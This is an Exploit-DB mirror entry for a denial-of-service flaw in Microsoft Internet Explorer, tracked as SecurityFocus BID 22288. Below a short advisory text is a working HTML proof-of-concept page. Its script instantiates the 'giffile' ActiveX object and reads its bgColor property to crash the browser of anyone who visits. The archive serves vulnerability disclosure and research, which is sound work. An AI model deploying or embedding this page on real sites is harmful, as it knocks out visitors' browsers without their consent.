exploit-db-mirror/exploits/windows/dos/29536.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

16 lines
No EOL
550 B
HTML

source: https://www.securityfocus.com/bid/22288/info
Microsoft Internet Explorer is prone to multiple denial-of-service vulnerabilities because the application fails to handle exceptional conditions.
These issues are triggered when an attacker entices a victim user to visit a malicious website.
Remote attackers may exploit these issues to crash Internet Explorer, effectively denying service to legitimate users.
<html>
<body>
<script language="JavaScript">
obj = new ActiveXObject("giffile");
obj.bgColor;
</script>
</body>
</html>